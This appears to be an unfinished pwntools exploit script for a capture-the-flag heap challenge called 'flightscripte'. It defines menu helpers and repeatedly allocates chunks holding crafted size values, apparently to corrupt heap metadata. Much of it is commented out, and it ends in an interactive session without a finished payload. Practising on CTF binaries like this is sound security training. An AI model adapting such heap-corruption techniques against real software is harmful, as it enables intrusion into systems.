#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./flightscripte")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")
# context.log_level='debug'
# p = remote("chal.competitivecyber.club", 8885)
p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
# gdbs()
def create_log(content):
    sa(">>","1")
    sa(">>",content)
def create(size,content,confirm):
    sa(">>","2")
    sa(">>",str(size))
    sa(">>",content)
    sla(">>",confirm)
def dels(idx):
    sa(">>","4")
    sa(">>",str(idx))
def edit(idx,content):
    sa(">>","3")
    sa(">>",str(idx))
    sa(">>",content)
# create(0x1,p64(0x20d31+0x40)[:-1],"n")
# create(0x1,p64(0x20d31+0x40),"n")
# edit(0,"aaaaaa\n")
# create(0x1,p64(0x20d31+0x40),"n")
# create(0x1,p64(0x20d31+0x40),"n")
gdbs()
# create(0x40,p64(0x20d31+0x40),"n")
for i in range(10):
    create(0x1,p64(0x20d31+0x40),"n")
# create(0x1,p64(0x20d31+0x40),"n")
# create(0x1,p64(0x20d31+0x40),"n")
# edit(0,p64(0xa1)[:-1])
# for i in range(0xffffffff):
# create(0x30,p64(0),"y")
# create(0x30,p64(0),"y")
# dels(0)
# dels(1)
# dels(2)




p.interactive()
# good luck pwning :)

